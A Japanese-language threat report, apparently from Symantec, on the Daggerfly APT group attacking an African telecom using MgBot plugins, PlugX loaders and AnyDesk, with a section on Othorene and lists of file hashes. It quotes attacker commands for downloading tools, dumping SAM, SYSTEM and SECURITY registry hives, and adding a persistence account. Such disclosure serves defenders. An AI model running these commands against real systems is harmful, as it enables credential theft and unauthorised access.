Daggerfly:APT攻撃者、アフリカの通信会社を標的に
新たなMgBotマルウェアフレームワークのプラグインが最近の活動で使用される
アフリカの電気通信会社が、Daggerfly(別名Evasive Panda、Bronze Highland)と呼ばれるAPT(Advanced Persistent Threat)グループの新たな標的になっています。さらに、直近のグループ活動では、今までにない新しいMgBotマルウェアフレームワークのプラグインが使用されています。
この攻撃対象となったネットワークでは、2022年11月に悪意のある活動の兆候が初めて確認されていますが、今回によりその活動が今現在も続いていることが示唆されます。Broadcom Softwareの一部門であるシマンテックの脅威調査チームの研究者は、当該のネットワーク上でMgBotのモジュラー型マルウェアフレームワークに関連する独特なプラグインを複数発見しました。また、攻撃者がPlugXローダーを使用して、正規のAnyDeskリモートデスクトップソフトウェアを悪用していたことも確認しました。MgBotのモジュラー型マルウェアフレームワークとPlugXローダーの使用は、過去に中国関連のAPTと関連付けられています。
この活動とDaggerflyの関連性は、MalwarebytesがEvasive Pandaに帰属するとした活動に関するブログ(2020年)の内容に一部基づいています。活動のクロスオーバーは、次のとおりです。
- いずれの活動でも、見つかったMgBotサンプルの1つが確認された
- いずれの活動でも、ProgramData\Microsoft\PlayReadyのディレクトリに、Rundll32.exeファイルをリネームした「dbengin.exe」という名前のファイルが確認された
- いずれの活動でも、csidl_common_appdata\microsoft\playready\mdie942.tmpのディレクトリに、ローダーDLL「pMsrvd.dll」が確認された
直近の活動で使用されたフォルダやファイル名だけでなく、DLLサイドローディングの使用も、帰属を裏付けるものです。Malwarebytesが記録した活動は2020年に発生し、Daggerflyは少なくとも2014年から活動していたと考えられます。
攻撃チェーン
2022年11月にMicrosoft Exchangeメールサーバーで発見された疑わしいAnyDesk接続は、最近のDaggerflyの活動で標的となった攻撃対象ネットワークにおける疑わしい活動の最初の兆候の1つでした。AnyDeskは正規のリモートデスクトップソフトウェアですが、リモートアクセスなどの目的で攻撃者が悪用することも少なくありません。
また、同じExchangeサーバ上で暗号マイニングマルウェア「WannaMine」も確認されていますが、この活動はDaggerflyグループとは無関係である可能性が高いと思われます。しかし、WannaMineが確認されているということは、当該のサーバーにパッチが適用されておらず、EternalBlueエクスプロイトや、このウェブサーバーを標的としたより新しいエクスプロイトに対して脆弱であった可能性を示しています。
また、正規のRisingアンチウイルスソフトウェア(無料)を使用して、攻撃対象の機器にPlugXローダーをサイドロードしていました。
以下では、攻撃チェーンについて詳しく解説します。
ファイルのダウンロード
攻撃者は、環境寄生型(living-off-the-land)ツールのBITSAdminとPowerShellを使用して、攻撃対象のシステムにファイルをダウンロードしました。さらに、この方法で正規のAnyDesk実行可能ファイルとGetCredManCredsツールをダウンロードしました。
bitsadmin /transfer d7d3 https://download.anydesk.com/AnyDesk.exe CSIDL_COMMON_APPDATA\anydesk.exe
“CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://download.anydesk.com/AnyDesk.exe -OutFile CSIDL_COMMON_APPDATA\anydesk.exe
認証情報のダンプ
攻撃者は、予めダウンロードしたGetCredManCredsのスクリプトを使用して、PowerShellで認証情報マネージャーに保存されているWebサービスのユーザー名とパスワードを取得しました。
"CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://raw.githubusercontent.com/VimalShekar/PowerShell/master/GetCredmanCreds.ps1 -OutFile CSIDL_COMMON_APPDATA\a.ps1
また、攻撃者はReg.exeツールを使用して、WindowsレジストリのSAM(セキュリティアカウントマネージャー)、System、Securityのハイブもダンプしました。これにより、攻撃者はSAMデータベースから認証情報を抽出することができました。
"CSIDL_SYSTEM\reg.exe" save hklm\sam sam.save
"CSIDL_SYSTEM\reg.exe" save hklm\system system.save
"CSIDL_SYSTEM\reg.exe" save hklm\security security.save
ローカルアカウントでの永続化
また、Daggerflyはローカルアカウントを作成して、攻撃対象のシステムへのアクセスを維持していました。使用されたコマンドラインは、次のとおりです。
"CSIDL_SYSTEM\net.exe" user [REDACTED] Pqssword1 /add
MgBotのモジュラー型マルウェアフレームワーク
MgBotは、巧みに設計されたモジュール型フレームワークであり、積極的に維持されています。フレームワークのコンポーネントは、次のとおりです。
- MgBot EXEドロッパー
- MgBot DLLローダー
- MgBotプラグイン
この活動で展開されたMgBotプラグインは、侵害された機器に関するかなりの量の情報を攻撃者に提供できる多数の機能を備えています。この活動で展開された特有のプラグインには、次のものがありました。
- ネットワークスキャナ-innocence.dll
- 機能:ARPスキャン、HTTPスキャン、実行しているサーバーの種類判別(SQL、WebLogic、Redisなど)。
- ChromeおよびFirefoxのインフォスティーラー(ブックマークや閲覧履歴などの情報を収集)-bkmk.dll
- ロギングモジュール-famdowm.dll
- オープンソースのeasylogging++をベースにしており、基本的なロギング、パフォーマンスの追跡などを実行できます。
- QQメッセージのインフォスティーラー-qmsdp.dll
- チャットツールのメッセージデータベースがハッカーによってクラックされた経緯を詳細に説明したこのブログが元になっています。
- Active Directoryの列挙-ceeeb.dll
- Active Directoryから次の情報を収集します。
- メンバー情報
- パソコン
- ローカル管理者
- リモートデスクトップユーザー
- DCOMユーザー
- Active Directoryから次の情報を収集します。
- パスワードダンパー-cpfwplgx.dll
- ファイルをドロップしてMiniDumpWriteDump APIを呼び出し、プロセスメモリをダンプします。
- QQキーロガー-kstrcs.dll
- QQEdit.exeやQQ.exeのプロセスを標的にしたキーロガー。
- スクリーンおよびクリップボードグラバー-cbmrpa.dll
- クリップボードをキャプチャし、データをドラッグアンドドロップしてファイルに保存します。
- OutlookおよびFoxmailのクレデンシャル(認証情報)スティーラー-maillfpassword.dll
- オーディオキャプチャ-prsm.dll
- 感染したシステムから音声をキャプチャします。
- COMオブジェクトのIMMDeviceEnumeratorやIAudioCaptureClientを使用します。
- プロセスのウォッチドッグ-ansecprocesskeep.dll
- AnsecProcessKeepがサービスとして登録されています。
- プロセスの実行を維持するウォッチドッグであることが確認されています。
- .iniファイルでプロセス名が確認されています。
これらの機能がすべて使用されていたら、攻撃対象の機器から大量の情報が収集されていたことでしょう。これらのプラグインの機能から、この活動における攻撃者の主な目的が情報収集だったことがわかります。
Daggerflyが全く新しいタイプのプラグインを開発しているということは、攻撃対象のネットワークを標的に、攻撃グループがマルウェアや使用可能なツールの開発を積極的に続けていることを示すものです。
傾向は続く
通信会社は、これからも機密情報収集の主要な標的になることでしょう。エンドユーザーの通信情報を引き出せる可能性があるからです。
シマンテックの脅威調査チームは、他にも通信会社を標的とした最近の活動も確認しています。その活動は、脅威アクターのOthorene(別名Gallium)とある程度の関係があり、3月にSentinelOneが「Operation Tainted Love」という名前で最初に報告した機密情報収集活動の継続と考えられています。SentinelOneによると、当時の活動でOthoreneは中東の通信会社を標的にしていたことが報告されています。
Othoreneは2014年頃から活動を開始しており、個人の監視を強く意識した比較的小規模なグループと考えられます。また、APT41(別名Blackfly、Grayfly)と呼ばれるAPTグループとも関連している可能性があるとの指摘もあります。中国のAPTグループの間では、人員や戦術、技術、手順(TTP)が重複していることは珍しくなく、信頼関係だけで1つのグループに活動を帰属させることの方が難しいのでしょう。
シマンテックが確認した活動では、3つの組織が新たに攻撃対象となり、SentinelOneの報告と同じ活動で、アジアとアフリカで確認されました。3組織中2つは、同じ中東の通信会社の子会社でした。攻撃者は、2022年11月から攻撃対象のネットワークで活動していました。シマンテックは、攻撃者が認証情報をダンプし、NbtScanでネットワークをスキャンしていたことを確認しました。
認証情報のダンプには、この活動の主要マルウェア(mim221と呼ばれるpc.exe)が使用されていましたが、そのパスワードは、SentinelOneが報告した活動で使用されていたマルウェアと同じものでした。さらに攻撃者は、攻撃対象のネットワークを横方向に移動し、Scheduled Taskを使用して永続化し、レジストリからSAMとSystemのハイブをダンプしていました。また、攻撃対象の機器にActive Directoryデータベースをエクスポートした可能性があり、ドメインコントローラへのアクセスも可能で、攻撃対象のネットワークに深くアクセスすることができたという指摘があります。
保護/緩和
Symantec Protection Bulletinで保護に関する最新情報をご確認ください。
侵害の痕跡
IOCが悪意のあるもので、シマンテックが入手できるファイルであれば、Symantec Endpoint製品はそのファイルを検知し、ブロックします。
ファイルインジケータ-Daggerfly
MgBotドロッパー
c89316e87c5761e0fc50db1214beb32a08c73d2cad9df8c678c8e44ed66c1dab
90e15eaf6385b41fcbf021ecbd8d86b8c31ba48c2c5c3d1edb8851896f4f72fe
MgBot-aasrvd.dll、pmsrvd.dll
706c9030c2fa5eb758fa2113df3a7e79257808b3e79e46869d1bf279ed488c36
017187a1b6d58c69d90d81055db031f1a7569a3b95743679b21e44ea82cfb6c7
MgBotプラグイン
cb8aede4ad660adc1c78a513e7d5724cac8073bea9d6a77cf3b04b019395979a
2dcf9e556332da2a17a44dfceda5e2421c88168aafea73e2811d65e9521c715c
a6ed16244a5b965f0e0b84b21dcc6f51ad1e413dc2ad243a6f5853cd9ac8da0b
ee6a3331c6b8f3f955def71a6c7c97bf86ddf4ce3e75a63ea4e9cd6e20701024
585db6ab2f7b452091ddb29de519485027665335afcdb34957ff1425ecc3ec4b
29df6c3f7d13b259b3bc5d56f2cdd14782021fc5f9597a3ccece51ffac2010a0 ea2be3d0217a2efeb06c93e32f489a457bdea154fb4a900f26bef83e2053f4fd
54198678b98c2094e74159d7456dd74d12ab4244e1d9376d8f4d864f6237cd79
d9eec27bf827669cf13bfdb7be3fdb0fdf05a26d5b74adecaf2f0a48105ae934
cb7d9feda7d8ebfba93ec428d5a8a4382bf58e5a70e4b51eb1938d2691d5d4a5
2c0cfe2f4f1e7539b4700e1205411ec084cbc574f9e4710ecd4733fbf0f8a7dc
a16a70b0a1ac0718149a31c780edb126379a0d375d9f6007a6def3141bec6810
0bcdcc0515d30c28017fd7931b8a787feebe9ee3819aa2b758ce915b8ba40f99
PlugXローダー-proccom.dll、djcu.dll
c31b409b1fe9b6387b03f7aedeafd3721b4ec6d6011da671df49e241394da154
db489e9760da2ed362476c4e0e9ddd6e275a84391542a6966dbcda0261b3f30a
632cd9067fb32ac8fbbe93eb134e58bd99601c8690f97ca53e8e17dda5d44e0e
DumpCredStore-dumpcredstore.ps1、a.ps1
c1e91a5f9cc23f3626326dab2dcdf4904e6f8a332e2bce8b9a0854b371c2b350
5a0976fef89e32ddcf62c790f9bb4c174a79004e627c3521604f46bf5cc7bea2
AnyDesk-anydesk.exe
7bcff667ab676c8f4f434d14cfc7949e596ca42613c757752330e07c5ea2a453
ファイルインジケータ-Othorene
3f75818e2e43a744980254bfdc1225e7743689b378081c560e824a36e0e0a195 – pc.exe, rpc.exe(主要マルウェア)
1b8500e27edc87464b8e5786dc8c2beed9a8c6e58b82e50280cebb7f233bcde4–get.exe(SyskeyおよびSamkeyの表示に使用)
03bc62bd9a681bdcb85db33a08b6f2b41f853de84aa237ae7216432a6f8f817e – pc.dll
ae39ced76c78e7c2043b813718e3cd610e1a8adac1f9ad5e69cf06bd6e38a5bd – pc.dll
f6f6152db941a03e1f45d52ab55a2e3d774015ccb8828533654e3f3161cfcd21 – pc.exe
2f4a97dc70f06e0235796fec6393579999c224e144adcff908e0c681c123a8a2 – pc.dll
22069984cba22be84fe33a886d989b683de6eb09f001670dbd8c1b605460d454 – pc.dll
7b945fb1bdeb27a35fab7c2e0f5f45e0e64df7821dd1417a77922c9b08acfdc3 – rpc.dll
e8be3e40f79981a1c29c15992da116ea969ab5a15dc514479871a50b20b10158 – pc.dl
b5c46c2604e29e24c6eb373a7287d919da5c18c04572021f20b8e1966b86d585 – rpc.dll
53d2506723f4d69afca33e90142833b132ed11dd0766192a087cb206840f3692 – test.exe
26d129aaa4f0f830a7a20fe6317ee4a254b9caac52730b6fed6c482be4a5c79d – g.dll
b45355c8b84b57ae015ad0aebfa8707be3f33e12731f7f8c282c8ee51f962292 – g.dll
17dce65529069529bcb5ced04721d641bf6d7a7ac61d43aaf1bca2f6e08ead56 – getHashFlsa64.dll
98b6992749819d0a34a196768c6c0d43b100ef754194308eae6aaa90352e2c13 – getHashFlsa64.dll
6d5be3e6939a7c86280044eebe71c566b48981a3341193aa3aff634a3a5d1bbd – getHashFlsa64.dll
1cf04c3e8349171d907b911bc2a23bdb544d88e2f9b8fcc516d8bcf68168aede – getHashFlsa64.dll
We encourage you to share your thoughts on your favorite social platform.